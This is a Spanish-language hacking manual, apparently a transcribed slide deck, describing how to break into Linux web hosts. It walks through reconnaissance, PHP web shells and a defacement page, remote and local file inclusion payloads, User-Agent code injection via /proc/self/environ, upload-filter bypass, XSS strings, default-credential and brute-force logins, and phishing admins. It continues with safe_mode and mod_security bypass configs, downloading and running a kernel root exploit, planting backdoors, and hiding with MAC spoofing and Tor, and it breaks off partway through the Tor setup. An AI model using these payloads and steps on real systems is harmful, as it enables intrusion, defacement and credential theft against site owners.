Infiltraciones - Un Poco de Todo

33
Infiltraciones @ Servidores Indice Identificación y Recolección de Meta datos Métodos de Intrusión Elevar Privilegios Salir Limpios xD En este Manual me concentrare mas en el entorno Linux. Este documento trata de servidores web que muchas veces con administradores que no tienen mucha experiencia y puede que tengan estos errores y acabar en una intrusión en su sistema, conseguir informacion delicada o importante o hasta provocar un deface de la web . Los Errores que se exponen pueden ser gran peligro para su web, para que no comentan los mismo errores para mejorar su web y servidores. Nota: No me hago Responsable por el contenido expuesto en este documento, cada lector es responsable de el uso del mismo. Identificación y Recolección de Meta datos Que es La identificación y recolección de MetaDatos? :Es Identificando al sistema como seria www.web.com y buscar cualquier inforamcìon importante que nos pueda ser de utilidad para nuestra futura intrucion. Tenemos que saber que es lo que estamos enfrentando, la seguridad del sistema y que podemos usar con cada tipo de web. Una cosa muy Importante en esto es el recopilatorio de datos (Información Importante del sistema). Que tipo de información necesitamos del sistema? Cuando Buscamos Información debemos de buscar información sensible o Importante de la Web y/o host para poder usar esa información para mas adelante. Esta información podría ser desde el nombre , correo, teléfono del administrador de la web o del host, esto posiblemente nos podría llevar al usuario o password del servidor. Un simple documento nos podría decir que programas usa para ver si podemos explotar dicho programa a nuestro beneficio. Obtener información como cual es el Sistema Operativo del host, con que servicios cuenta, las versiones del servicio del host y con cuantos Dominios Tiene el Host. Como muchos sabemos el hosting es el alojamiento de paginas y tienen que administrar el Host para varias webs.

Transcript of Infiltraciones - Un Poco de Todo

Page 1: Infiltraciones - Un Poco de Todo

Infiltraciones @ Servidores

Indice

• Identificación y Recolección de Meta datos• Métodos de Intrusión• Elevar Privilegios• Salir Limpios xD

En este Manual me concentrare mas en el entorno Linux.Este documento trata de servidores web que muchas veces con administradores que no tienen mucha experiencia y puede que tengan estos errores y acabar en una intrusión en su sistema, conseguir informacion delicada o importante o hasta provocar un deface de la web .Los Errores que se exponen pueden ser gran peligro para su web, para que no comentan los mismo errores para mejorar su web y servidores.Nota:No me hago Responsable por el contenido expuesto en este documento, cada lector es responsable de el uso del mismo.

• Identificación y Recolección de Meta datos

Que es La identificación y recolección de MetaDatos? :Es Identificando al sistema como seria www.web.com y buscar cualquier inforamcìon importante que nos pueda ser de utilidad para nuestra futura intrucion.

Tenemos que saber que es lo que estamos enfrentando, la seguridad del sistema y que podemos usar con cada tipo de web.

Una cosa muy Importante en esto es el recopilatorio de datos (Información Importante del sistema).

Que tipo de información necesitamos del sistema?

Cuando Buscamos Información debemos de buscar información sensible o Importante de la Web y/o host para poder usar esa información para mas adelante.Esta información podría ser desde el nombre , correo, teléfono del administrador de la web o del host,esto posiblemente nos podría llevar al usuario o password del servidor.Un simple documento nos podría decir que programas usa para ver si podemos explotar dicho programa a nuestro beneficio.

Obtener información como cual es el Sistema Operativo del host, con que servicios cuenta, las versiones del servicio del host y con cuantos Dominios Tiene el Host.

Como muchos sabemos el hosting es el alojamiento de paginas y tienen que administrar el Host para varias webs.

Page 2: Infiltraciones - Un Poco de Todo

Pero que pasa si Obtenemos el control de una de las paginas que aloja dicho Host?

Cuando Obtenemos una shell en alguna web sabemos que tenemos el control total sobre la web .

Si somos Ingeniosos y tenemos posibilidades podríamos elevar los máximos privilegios explotando el servidor para alcanzar el usuario máximo, que es Root.

Cuando somos Root somos Capaces de hacer lo que sea en el servidor.Desde modificar los passwords hasta hacernos el control de todas las webs alojadas en el host

Como Saber Cuantos Dominios Tiene la Pagina?

Reverse IP Domain http://www.yougetsignal.com/tools/web-sites-on-web-server/

Una vez que conocemos cuan es tan grande el Host mas podemos saber las posibilidades sobre la intrusión.Si es muy grande quiere decir que tiene fama y tendrá mucha seguridad y sera mas difícil y poco probable de entrar al Host.

Scanner de PuertosUn Scanner de Puertos Usa Protocolo TCP/IP y Determina si el servicio del puerto esta Open o Close.

Cuando Escaneamos un puerto se usa este procedimiento :[-Solicitando] * Empieza enviando un paquete SYN a un puerto específico.

[-Aceptado] * Si el destino devuelve un SYN/ACK, el puerto está Abierto y escuchando conexiones.

[-Rechazado] * Pero si regresa un paquete RST, el puerto está Cerrado.

[-Filtrado] * Si recibe un paquete ICMP, el puerto está Filtrado por algún tipo de cortafuegos.

Comencemos por un sondeo de puertos con NmapNmap (‘Network Mapper’), es una herramienta open source, diseñada para explorar y para realizar auditorias de seguridad en una red de computadoras.

Con esta Herramienta podriamos saber que puertos y servicios dispone el host escaneado.

El Escaneo de puertos se usa de la siguiente manera:$ nmap <opciones> <IP/HOST>

Identificamos las versiones de lo servicios y el OS que maneja.

$ nmap -sV -O www.web.comCon este Scanner -O nos dira si el Host es un Windows o Unix -sV nos dirá la Vercion de los servicios que tiene activos

Page 3: Infiltraciones - Un Poco de Todo

Identificando los Servicios Vulnerables

Cuando recolectamos información acerca de los servicios de el host, nos puede de ser de utilidad para identificar los servicios probablemente vulnerables.

Cuando escaneamos los Servcios de los Host, nos botan algunas veces verciones de servicios que no han sido actualizados y probablemente sea Vulnerable a un ataque.

Ejemplo: la victima tiene el servicio ssh activo y una vercion probablemente vulnerable:

21 open Ftp 2.0.3 22 open Ssh 1.0.1 <--Probablemente Vulnerable

Con el Ejemplo expuesto podemos usar la información obtenida para buscar un posible ataque.Ssh vercion 1.0.1 esta vercion debe de ser muy vieja y por lo tanto debe de ser Vulnerable a un ataque, y si lo es debe de tener algún exploit ya publicado anteriormente

Tenemos que tener claro que son los exploits para poder hacer un buen uso de ellos un resumen de Bugs y Exploits:Bug: Error de código Exploit: explota un Bug para sacarle el mejor provecho posible.

Con un exploit podríamos hacer una buena intrusión o sacar mas informacion, siempre y cuando sepamos usarlo.

Dirbuster

Que es DirBuster?DirBuster es Una Herramienta de OWASP Diseñada en Java con programadores que son expertos en Fuerza Bruta.Esta Herramienta es de gran Utilidad para analizar los Directorios De Una Web por un diccionario.

* Navegando por la web muchos paths se descubren solos.

Page 4: Infiltraciones - Un Poco de Todo

Una vez terminado el Escanee la web nos muestra los resultados.

Una vez que conozcamos al sistema y que es lo que tiene ahora pasamos a hacer las busquedas y escaners mas específicos.

METADATOS (A NIVEL DOCUMENTO)

Metadatos en documentos diarios

Con todo este lío de google hacking y todo lo demás, se me ha entrado en ganas de hablar sobre metadatos, y nada mejor si es basado sobre los discursos de metadata security de chema alonso, vamos al hilo.

Intentare hacer rápidamente un esquema para que nos hagamos una idea sobre que nos puede ser útil el metadato en si, supongo que ya sabes lo que es un metadato así que no me iré dando vueltas e intentare ser preciso.

Antes de explicar los tipos de metadatos les dejare con una imagen de metadatos puros en si y no modificados, para que tengas una idea de la utilidad que nos puede dar.

Page 5: Infiltraciones - Un Poco de Todo

Analicemos la imagen, así podre orientarlos a esa pregunta que todos se hacen, de que me puede ser útil el metadatos, para que y de que forma puedo utilizarlo?.

• Fijense el primer lugar, este nos ha entregado el lugar donde se trabajo el archivo con su directorio, sabemos que el autor se llama "biblioteca" y este archivo se encuentra en Mis dctos/Vos/Sey/leyes y se ha extraído desde un disco externo.También identificamos el nombre de usuario así que es aplicable un bruteforce si es que conseguimos los DNS propios

• Por otro lado tenemos la versión en que fue trabajado el archivo "Microsoft Word", en el caso de que hubiera sido un archivo pdf y obtengamos la versión, tendríamos mas posibilidades de explotar alguna vulnerabilidad que este tenga consigo. (No es ninguna casualidad saber sobre exploits de adobe).

• Se repite el nombre de usuario que creo el fichero, en este caso biblioteca (DATO VITAL).

• Y por ultimo tenemos la fecha, la fecha haber de que nos puede servir la fecha en un metadato, (En una investigación del usuario?, supongamos que este archivo word sea una foto, una foto cualquiera y necesitamos saber en que fecha fue creada para coincidir alguna prueba legal, una simple fotografía puede determinar el dictamen de la sentencia).

Page 6: Infiltraciones - Un Poco de Todo

Los metadatos nos serán útiles a la hora de crearnos una lab para el desarrollo de pentesting ordenado. Metadatos se subdivide en dos categorías dando origen a:

• Datos perdidos: Son aquellos datos que se pueden encontrar en hipervinculos, y generalmente por la mala utilizacion de la herramienta al pasar de un formato a otro o a través de los mismos hipervinculos donde nos pueden brindar información relevante con respecto a la net interna o sobre dns propios etc. En el caso de la foto que publique arriba, se puede llamar también datos perdidos a esa información que es legible dentro del contenido no importa si esta escondida o no, Acaban de tener el nombre de usuario de mi maquina (MAQUINA DE PRUEBA), fecha y hora en la cual tome la screenshot.

• Datos Ocultos: Son aquellos datos que se crearon para ser leídos únicamente con el software creado, ya sea para la edición o realización, así que en conclusión estos datos no puede ser legibles por nosotros, pero tenemos la buena noticia de que este tipo de datos pueden intercalarse entre si.

Me explico, estos tipos de metadatos pueden migrar de uno a otro por diversas razones. Intentare explicarlo con ejemplos claves.

1. Tenemos un fichero con metadatos como el de arriba. al convertirlo a una extencion word este software adobe al no saber como leer el archivo doc originario puede poner la información al final colándola y filtrándola, pasando a ser datos ocultos. (De esta misma forma podemos borrar metadatos intencionalmente, por la razón que sea)

2. O de datos ocultos a metadatos, en el caso de que subamos un fichero que no contenga datos a mostrar en la primera hoja, el buscador tiene que por obligación buscar información para colarla al pie de titulo. Puede generar nombres de autores que pueden coincidir directamente con el nombre de usuario.

3. O de metadatos a datos perdidos en el caso de que incrustemos una imagen a un archivo pdf o word, dando origen a (metadatos sobre metadatos) este nos puede indicar la ruta de intras o extras, o información de la misma maquina. Puede darse el caso de que mucha información que se pueda colar como datos perdidos pasen a ser datos ocultos. (Excepción).

En síntesis de este pequeño párrafo, sabemos que el tipo de metadato en documentos puede variar y rotar, teniéndolo en cuenta podemos concluir que es posible manipular de cierta forma lo que es metadatos, pasándolo a datos ocultos o a datos perdidos. Y que nos serán útiles para agregar claves por defectos o explotar una vulnerabilidad en una intrusión ordenada.

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

Page 7: Infiltraciones - Un Poco de Todo

Herramientas que pueden ser utilizadas y recomendadas.

1 - En el caso de sistema operativo windows. FOCA a ojos cerrados No es un software de paga, es un software libre para pentest y sinceramente mejor que cualquier metadata search que pueda existir en linux.

2 - Para linux recomiendo extract, que puede ser instalado con un simple apt (muchas versiones la tienen por defecto).

Cuando Sabemos Buscar en Google este método puede ser de gran utilidad.

• Métodos de intrusión

Como podemos hacer una Intrusión?

Oks, Creo que reunimos algo de informacion del servidor, ahora vamos a tratar de acceder a la web

Como Acceder o hacer la Intrucion?Existen muchos metodos para hacerlo, hablare de los mas vistos y populares.

Hay que tener en mente que lograr una shell sera nuestro mejor logro en la intrusión, porque nos da posibilidades de conseguir el máximo user de el servidor.

Voy a explicar un poco acerca de las shells en php, no explicare a fondo, pero si un poco de su uso, lo demás lo tendrán que googlear, no siempre uno les explicara todo, también tienen que aprender a Buscar ^^.

Defacing por shell

Ya se Imaginaran a que les suena shell jeje CMD(Ms-Dos) o Konsola, pues es muy similar a ello ya que puede ejecutar los comandos como si estuviéramos en una shell de consola pero digamos que en Modo Grafico, estas shells lo que tienen en especial es que las puedes ejecutar en un archivo php.Y están diseñadas especialmente para el manejo de archivos y darnos un poco de comodidad.

Con una shell podemos hacernos del control total de la web y hacer lo que queráis

Bien. Si quieren probar una shell por primera vez :

• Alojamos la shell en php en un hosthttp://web.com/shell.php

Page 8: Infiltraciones - Un Poco de Todo

En una shell podemos editar, crear, eliminar archivos del servidor para nuestro beneficio.En la parte donde dice action hasta la derecha podemos seleccionar ver o descargar el archivo

En mi caso voy a editar el index :P.Con un poco de conocimiento de html y JavaScript podemos hacer un index para el defacing:<html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>Defaced</title></head><body bgcolor="#000000" text="#FFFFFF"> <br /><br /><br /><script>var x;x=prompt('Quien es el hacker?','');document.write("<center><h1>Defaced by "+x+"</h1></center>"); </script></body></html>

• Guardamos el nuevo codigo de nuestra index

Para ver el resultado copeen al code en un archivo.html

Otra manera de Obtener shell...

* Una vez que sepamos usar las shells entonces podemos saber los métodos de conseguir una.

RFI [Remote file inclusion]

Page 9: Infiltraciones - Un Poco de Todo

Esta Vulnerabilidad la podemos encontrar con variables mal programadas y ejecutarlas con una shellejecutándola remotamente desde el mismo servidor.Ejemplo: Tenemos la web con el path

http://www.ejemplo.com/index.php?page=pagina.php

explotamos la vulnerabilidad con un path que conduce directo a la shell en txt, si la ejecutamos en.php se ejecutaria en nuestro servidor del la shell .

http://www.ejemplo.com/index.php?page=http://ejemplo.com/paths/paths/shell.txt??y se ejecutara una shell en la pagina solo agregando “??”, aunque no siempre es necesario como el ejemplo de las imagenes.

El Codigo que hace posible esto es el siguiente:

Page 10: Infiltraciones - Un Poco de Todo

<? include($_GET[’variable’]); ?>

El code incluye una variable para poder ejecutar un archivo en GET.Para poder explotarla es :

http://web.com/path/archivo.php?variable=archivoremoto

Archivo Remoto:<?

System($comando);?>

y para explotarlo seria:

http://web.com/path/archivo.php?variable=archivoremoto.gif?&cmd=ls

Usamos el path de la web y usamos el archivo php como “jpg” y un “?” para ejecutarlo (Nos Damos cuenta que podemos usar varias exenciones de archivos para ejecutar el RFI ) y agregando con “&” el comando “ls” es un comando para visualizar los archivo y carpetas , podríamos poder usar cualquier otro comando para ejecutar en el servidor.

Una vez obtenida la shell ya podemos hacer lo que sea y proseguimos a rootear el server .

LFI [Local file inclusion]

a diferencia de RFI esta permite ver los archivos de la web ejemplo si queremos ver lospass del host de la web pero de la misma forma lo hacemos con GET.

http://www.ejemplo.com/index.php?page=../../../etc/password ohttp://www.ejemplo.com/index.php?page=../../../etc/password%00 o simplementehttp://www.ejemplo.com/index.php?page=/etc/passwd

%00 es una traduccion en hexadecimal diciendo que es o nada , en los archivos .exe de %00 lo� interpreta como un “.”y se avanza muchos directorios para estar hasta la cima de los directorios y poder entrar en /etc/passwd

Page 11: Infiltraciones - Un Poco de Todo

o podemos ver el archivo shadow si el user del host es root para que podamos visualizarlo :P.

http://www.ejemplo.com/index.php?page=../../../etc/shadow

lo de ../../../ es para retroceder directorios, dependiendo si estas en varias carpetas para llegar hasta arriba y poder entrar en /etc/

Para visualizar el archivo de los passwords pero hay quienes para acegurarse van como ../../../../../../../../../../../../../../../etc/passwd <-Para asegurarse de que no esta dentro de un directorio :D,

aunke no siempre funciona , hay que saber con exactitud en que directorios estamos del servidor.

En es como si fuera RFI solo que usamos el servidor mismo con dicha vulnerabilidad de ejecutar archivos de el propio servidor

Para los que quieren mas y conseguir una shell desde LFI

si en la vulnerabilidad de LFI nos permite visualizar los archivos entonces podemos ejecutar comandos con esta teoría y Podríamos ejecutar comandos con las

cabeceras y modificando el User-Agent poniendo:

<? system(“comando”); ?>

nos movemos en la parte donde nos permite ejecutar comandos desde el User-Agent: /proc/self/environ

una ves en una parte donde nos permita la ejecución del código desde HTTP

www.ejemplo/vuln.php?var=../../../../../proc/self/environ

Usare como ejemplo User Agent Switcher para hacer la injeccionpara abrirlo:

Herramientas->Default User Agent->Edit User Agents

Page 12: Infiltraciones - Un Poco de Todo

y nos creamos uno

Descripcion :Nombre Useragent :injeccion

ejecutara el comando ls -l que son los archivos y carpetas en forma de lista

Ahora: Herramientas->Default User Agent->shelly recargamos la pagina...

Page 13: Infiltraciones - Un Poco de Todo

con esto nos queda claro que podemos ejecutar comandos en el servidor con comandos en php y sacarle mucho beneficio.

Obteniendo shell con LFI

Esta vez hacemos un user Agent personalizado que nos descargue la shell en formato txt y con el nombre de shell.php

Page 14: Infiltraciones - Un Poco de Todo

Accedemos a la shell

Vulnerabilidad:

<?php$param = $_GET['VARBL'];

include( $varbl . ‘.php’ );?>

http://ejemplo.com/vulnerable.php?varbl=../../../../../etc/passwd%00

Pero lo interesante de esta vulnerabilidad es como conseguir subir una webshell y poder obtener la posibilidad de ejecutar comandos del Sistema Operativo con los permisos del servidor Web, pudiendo

comprometer completamente el servidor.

Es interesante que ejecutar un solo comando a una web podria quedar vulnerable para hacer una intrusión.

Shell Upload

esta no es una vulnerabilidad pero si es un descuido del administrador en dejar que usuarios puedan subir archivos al servidor, y podria ser un archivo malicioso como una shell en php.

Page 15: Infiltraciones - Un Poco de Todo

Shell uploader es cuando normalmente vemos un upload como este

Bien sabemos que podemos usar un uploader para subir un archivo malicioso para la web,ahora si el uploader no acepta archivos php? Si fuera de simples imágenes?

Que podríamos hacer?

El uploader solo revisa las exenciones, si es un .php .gif, etc.., siempre las revisa al principio antes de pasar al subirlo

Bypasseando(burlar) al Uploadercambiamos nuestra shell de extensión por una de imagen “.jpg”

ahora Con una Herramienta que capture cabeceras podremos cambiar la extencion del archivoHTTP Live Headers (Complemeto para Mozilla)

Escojemos nuestro archivo JPG que luego con las cabeceras podemos cambiar la extensión del archivo a subir.

Herramientas->Live HTTP Header

Y capturamos las cabeceras HTTP para capturar el procedimiento.

ahora subimos el archivo y la heramienta capturara las peticiones del upload.Despues que capture todo el procedimiento nos vamos casi hasta arriba en l parte donde venga nuestra

shell y damos en el nombre:

filename=”shell.jpg” y le damos en repetir para cambiarle la extencion.

Page 16: Infiltraciones - Un Poco de Todo

Una vez echo lo anterior nos muestra una ventana donde nosotros cambiaremos las cabeceras

y cambiamos: filename=”shell.jpg”

porfilename=”shell.php”

Una vez subida accedemos a la shell.

Page 17: Infiltraciones - Un Poco de Todo

Hay veces que no nos muestra en donde subio la shell y es porque se tomaron algunas medidas de seguridad y no nos muestre donde se alojan los archivos subidos, pero

es probable que podamos sabiendo las carpetas y archivos del servidor con DirBuster.

Esta no es una vulnerabilidad (aunque yo si lo llamaría así), pero si es error de los administradores hacer que usuarios puedan subir archivos al servidor.

Como saber si la web es Vulnerable a alguna injeccion ?Para eso usaremos algún Scanner de http para buscar alguna vulnerabilidad en algún archivo de la web

Escaneando HTTP con SSS

Estos escaneos en realidad lo hacen con paths predeterminadas para comprobar si la web es vulnerable a alguna injection o si existe algún exploit para lograrla.

En la parte de la izquierda presionamos Donde dice Scanner para una nueva sesión de escaneo

Page 18: Infiltraciones - Un Poco de Todo

Usamos la opcion de HTTP Scann para revisar si hay algún archivo vulnerableDamos en Add Host

Ponemos la web a escanear y damos en “Add” y despues Next.

Una vez agregada seleccionamos la web y damos en “Start Scan” para empezar el EscaneoListo, ahora esperamos respuesta del Escaneo y no tardara tanto como hacer el escaneo completo que

muchos todavía hacen.

Para Ver las Vulnerabilidades de la web vamos a la pestaña de VulnerabilidadesEn este caso elijo una XSS (Cross Site Scripting)

<A href="http://web.com/htmltonuke.php?"

Page 19: Infiltraciones - Un Poco de Todo

Significa que qe donde esta la vulnerabilidad es en http:/web.com/htmltonuke.php?

En la paerte de hasta abajo de la descripcion de la vulnerabilidadesta una parte donde dice Bugtraq ID con un numero

Bugtraq ID | xxx

dentro del enlace de “8174”nos abrirá la web con detalles con el exploit

y en la pestaña de exploit nos aparece

y con los detalles de la vulnerabilidad

Page 20: Infiltraciones - Un Poco de Todo

<A href="web.com/htmltonuke.php?"

solo tendriamos que hacer un XSS con al path Vulnerable de la siguiente manera

http://web/htmltonuke.php?<script>alert('web vuln a xss')</script>

o podemos ejecutar el script en hex = sirve.

http://web.com/htmltonuke.php?%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%78%73%73%2f%29%3c%2f%73%63%72%69%70%74%3e

En cuanto a las otras Vulnerabilidades pueden hacerlo de la misma forma dependiendola Vulnerabilidad que sea .

Si fuera un RFI seria con el path directo a la shell .

Es un Ejemplo de Scanner , podríamos Usar Nessus para encontrar Vulnerabilidades Web.

Probando users Default

Cuando los Administradores descuidan los usuarios de al host es muy probable que tengan users por default corriendo por por los servicios de Ssh y Telnet.

Cuentas default

Page 21: Infiltraciones - Un Poco de Todo

Login / Password

admin - admin sysadmin - sysadmin o admin

unix - unix uucp - uucp

rje - rje guest - guest demo - demo

daemon - daemon sysbin - sysbin

bin – bin

Si el Servidor tiene el SSH o Telnetpodemos usar un user default.

$ ssh www.web.com -l userdefault password: passdefault

Lo probamos con Telnet si es que tiene el servicio disponible :D

$ telnet www.web.com$ user : userdefault$ password : passdefault

Si Tenemos Suerte nos loguearemos ^^ y podemos pasar a rootearlo :P

Brute Force

Fuerza bruta (brute force)es una herramienta para testear que tan fuerte es la contraseña del administrador del sistema .Si el administrador es de lo que creen que su contraseña corta es segura

entonces es muy probable a que sea vulnerable a BruteForce

Brute force consiste en seleccionar un protocolo y testearlo con un diccionario de users y passwordsy va probando cada user y cada password del diccionario los protocolos

Page 22: Infiltraciones - Un Poco de Todo

pueden ser shh, ftp, telnet, pop3, etc...

Seleccionamos un Single Target (simple pagina) o Tartget List (lista de paginas)

Seleccionamos el protocolo y Proseguimos en la segunda pestaña”Passwords”

En esta parte ira la lista de users y passwordses preferible que usemos Username List y tengamos una lista corta de probables usuarios que podrían

ser los user del host

En Passwords List Ponemos el diccionario que elegimos

Page 23: Infiltraciones - Un Poco de Todo

Recomendable que en el diccionario de los passwords tengan incluidos los users que utilizaremos si escribió la misma pass que el user y pasamos a la pestaña de “Start”

Una vez completados los datos Damos en “Start”

Los usuarios remarcados son los que son validos.

Una vez que tenemos user y pass podemos hacernos de una shell o acceder directamente a ella para pasar a Rootear el servidor.

Infiltracìon con Ingeniería Social Consiste en hackear al administrador con un simple mensaje o correo pidiendo de alguna forma el usuario y password, decimos que somos de el hosting y necesitamos dichos datos para comprovary listo caerá redondo.

Un empleado que tenga privilegios para decirle que somos su jefe y necesito su user t pass ,o hacerle algún scam, etc.....

Esto se trata de Usar inteligencia para que el mismo usuario nos bote el user y passwd o informacion importante para poder conseguirla.

Podemos haciendo un simple llamada a la empresa a un empleado y hacerles el mismo juego.....

Nota: Estos métodos los podemos hacer a todos los host del sistema, de seguro por lo menos Uno Caera en algún método de infiltración por eso era importante conseguir el correo del la web.

Page 24: Infiltraciones - Un Poco de Todo

• Elevar Privilegios Cuando no Somos Root

Primero Tenemos que conseguir una terminal ya sea desde NetCat, Ssh, Telnet,etc...Nos ingeniamos con varios metodos para conseguir nuestra shell en consola.

SAFE_MODE

Safe_mode (Modo Seguro) Este medo lo usan los administradores de hostings seguros cuando cada usuario se tiene en /home y para evitar que los usuarios tengan determinados permisos, esto puede ser muy molesto, ya que el Safe_mode no permite que los archivos puedan ejecutar comandos peligrosos y eso nos inhabilita muchas opciones de ser root .

Bypass Safe_Mode

Usamos algun exploit para vulnerar la vercion de php que corre en el servidor.Para lograr eso nos si han visto en la shell c99 o r57 en la parte de php run o algo parecido que nos permita ejecutar el codigo php para poder bypassear el Safe_Mode.

Otra manera es subiendo un archivo.ini en la misma path(dirección) de nuestra shellphp.ini :

register_globals = Onengine = Onsafe_mode = Offsafe_mode_exec_dir = Onsafe_mode_include_dir =On

MOD_SECURITY

Esta es otra medida que toman los administradores que en ocaciones tenemos que bypassear tambienes el Mod_Segurity de Apache .Esto lo podemos bypassear agregando un code al archivo .htaccess

<IfModule mod_security.c>SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckUnicodeEncoding Off&/IfModule>

rootear servidores

Bien creo que ya sabemos bypassear algunas cosillas para nuestro beneficio.

Page 25: Infiltraciones - Un Poco de Todo

Una vez dentro del sistema podemos seguir con Rootearlo (Conseguir el máximo User como Root).Antes veremos un poco mas de inforamcion del sistema con uname

$ uname -r (vara ver la información del Kernel para Rootearlo)

$ uname -a (para saber mas info acerca del sistema)

mas información sobre al comando uname

$ uname –help

Lo que hacemos es ejecutar comandos para obtener la mayor información posible y lograr rootearlo

Observamos el archivo /etc/passwd con el comando cat para visualizar los passwords.

$ cat /etc/passwd (visualizamos el archivo passwd que esta en el directorio /etc/)

si nos funciona podemos descargarnos el archivo

$ cat /etc/passwd >> passwd

Las cuentas bin son muy interesantes ya que permiten la manipulación de muchos ficheros importantes como el fichero passwd.

Nos mostrara muchos usuarios cuanto ejecutemos cat /etc/passwd aunque la mayoría de los usuarios no se usan.

ejemplo mi usuario seria:

b4nz0klabs:my pass:1002:1002:b4nz0k-Labs

Tambien podria estar encriptado de la siguiente forma:

b4nz0klabs:ca6ea1c7a840e0990348ccfe9d519792:1002:1002:b4nz0k-Labs

pero si esta la “X” de la siguiente forma no podremos hacer mucho :S

b4nz0klabs:x:1002:1002:b4nz0k-Labs

significa que solo un usuario con priv elevados podra verloy el archivo esta en /etc/shadow, si somos un usuario elevado entonces con el comando

$ cat /etc/shadowEs Importante tener una coneccion por shell para que al ejecutemos un exploit para Rootearlo funcione

Page 26: Infiltraciones - Un Poco de Todo

correctamente.

Descargamos un exploit ya compilado para el kernel que vimos anteriormente

$ wget http://web/path/exploit

Damos Privilegios

$ chmod 777 exploit

y ejecutamos

$ ./exploit

Ejecutamos el comando id para saber si somos root

$ iduid=0(root) gid=0(root) grupos=0(root)

Listo somos Root, Server Rooteado .Si ejecutamos id antes de rootearlo se vera algo diferente.

Cuando somos Root entonces podemos controlar todo el sistema a nuestro gusto, podemos hacernos de las demás webs alojadas en el host que esta en nuestro control.

muchas veces cuando logramos una intrucion nos dejamos un backdoor para poder volver a entrar cuando sea .

BackDoor

Muchos se Preguntaran Que es un BackDoor?Backdoor en ingles puerta trasera que nosotros usaremos para volver al sitio.

Como podemos dejar un BackDoor?Fácil dejando una shell en php o atravez de nc(NetCat), aunque es mas recomendable lo de la shell.Por que el administrador se daría cuenta que algun puerto esta en escucha de alguna coneccion.

Page 27: Infiltraciones - Un Poco de Todo

• Salir Limpios

Spoofing

Winkipedia:

Spoofing, en términos de seguridad de redes hace referencia al uso de técnicas de suplantación de identidad generalmente con usos maliciosos o de investigación.

Existen diferentes tipos dependiendo de la tecnología a la que nos refiramos, los cuales se describirán más adelante, como el IPSpoofing, en términos de seguridad de redes hace referencia al uso de técnicas de suplantación de identidad generalmente con usos maliciosos o de investigación.

Existen diferentes tipos dependiendo de la tecnología a la que nos refiramos, los cuales se describirán más adelante, como el IP spoofing (quizás el más conocido), ARP spoofing, DNS spoofing, Web spoofing o e-mail spoofing, aunque en general se puede englobar dentro de spoofing cualquier tecnología de red susceptible de sufrir suplantaciones de identidad.

Mas Inforamcion http://es.wikipedia.org/wiki/Spoofing

Texto que nos explica como hacer mac spoofing en linux, bsd, mac os x y windows, es facil y directo.

Texto Completo:MAC Spoofing************

Puede haber razones muy diversas para decidir camuflar la MAC (es decir, ladirección Ethernet de los dispositivos de red, grabada "a fuego" en suhardware), pero la forma de lograrlo es muy diferente según el sistemaoperativo de que se trate...

Supongamos que 00:00:00:AA:AA:AA sea la MAC deseada y vayamos por partes,sin utilizar en ningún caso aplicaciones ajenas al propio sistema operativo:

Linux*****

Basta teclear estos tres comandos:ifconfig eth0 downifconfig eth0 hw ether 00:00:00:AA:AA:AAifconfig eth0 up

BSD***

Page 28: Infiltraciones - Un Poco de Todo

El proceso a seguir es muy similar al visto para Linux:ifconfig xl0 downifconfig xl0 link 00:00:00:AA:AA:AAifconfig xl0 up

Mac OS X********

Ojo: si la versión es anterior a Tiger antes hay que aplicar un parche al kernel.sudo ifconfig en0 lladdr 00:00:00:AA:AA:AA

Windows 2000/XP (método A)**************************

En Windows has de saber primero si tu dispositivo de red soporta o no laclonación de MAC. Si no es ése el caso, has de ir al método B.

Inicio -> Configuración -> Panel de Control -> RedesClick derecho sobre el NIC cuyo MAC se quiere cambiar -> Propiedades.General -> Configuración -> Avanzada.Propiedad -> Dirección de Red (o Dirección administrada localmente).Valor -> Teclear la nueva MAC (sin los : de separación).Ventana de comandos -> teclear ipconfig /all (o net config rdr) para comprobarsi se ha realizado o no el cambio.Si el cambio se ha realizado, rearrancar la máquina. Si no, probar el método B.

Windows 2000/XP (método B)**************************

Inicio -> Ejecutar -> Teclear regedt32.Ir a HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}Doble clicBuscar la clave DriverDesc del inyterfaz que se quiere modificar.Editar (o añadir) la clave de cadena (tipo REG_SZ) NetworkAddress para quecontenga la nueva MAC.Deshabilitar y volver a habilitar el interfaz cambiado (o rearrancar el sistema).

Se trata de una operación nada habitual -cierto- pero que obliga a replantearsesi Windows resulta siempre el sistema más amistoso con el usuario.

Fuentes e información complementaria:Changing Your MAC Address In Window XP/Vista, Linux And Mac OS X [IronGeek]MAC Address Spoofing [Mac Greekery]

Ducumento Obtenido http://www.govannom.org/seguridad/14-wifi-wireless-redes/154-como-hacer-mac-spoofing.html

Page 29: Infiltraciones - Un Poco de Todo

ahora que tenemos una MAC distinta nos damos mas seguridad para hacer la intrusión.Tambien podemos instalar algún tipo de proxy para navegar anónimamente.

Tor (The Onion Router): es una implementación libre de un sistema de encaminamiento llamado onion routing que permite a sus usuarios comunicarse en Internet de manera anónima.

Privoxy : es un programa que funciona como proxy web, usado frecuentemente en combinación con Tor y Squid. Tiene capacidades avanzadas de filtrado para proteger la privacidad, modificar el contenido de las páginas web, administrar cookies, controlar accesos y eliminar anuncios, banners, ventanas emergentes y otros elementos indeseados de Internet.

Instalar TOR, Privoxy en Ubuntu en pocos pasos y entendibles

Para instalar TOR en nuestro Ubuntu hay que seguir los pasos siguientes:

1. Abrimos una terminal para editar nuestros sources.list, ponemos en la terminal:

$ sudo gedit /etc/apt/sources.list

2. Se abre un editor de textos, hasta el final de la lista de repositorios agregamos el siguiente texto guardamos y cerramos:

$ deb http://deb.torproject.org/torproject.org karmic main

3. Ahora necesitamos agregar la llave publica del repositorio, abrimos otra vez la consola y agregamos:

$gpg --keyserver keys.gnupg.net --recv 886DDD89$gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

4. Ahora que esta agregado el repositorio de TOR y agregada su llave para poder instalarlo, necesitamos actualizar nuestra listado de repositorios:

$ sudo apt-get update

5. Por ultimo el toque final, instalar TOR y privoxy:

sudo apt-get install tor tor-geoipdb privoxy

6. Configuramos Privoxy para que funcione perfecto el archivo /etc/privoxy/config para eso escribimos en la terminal:

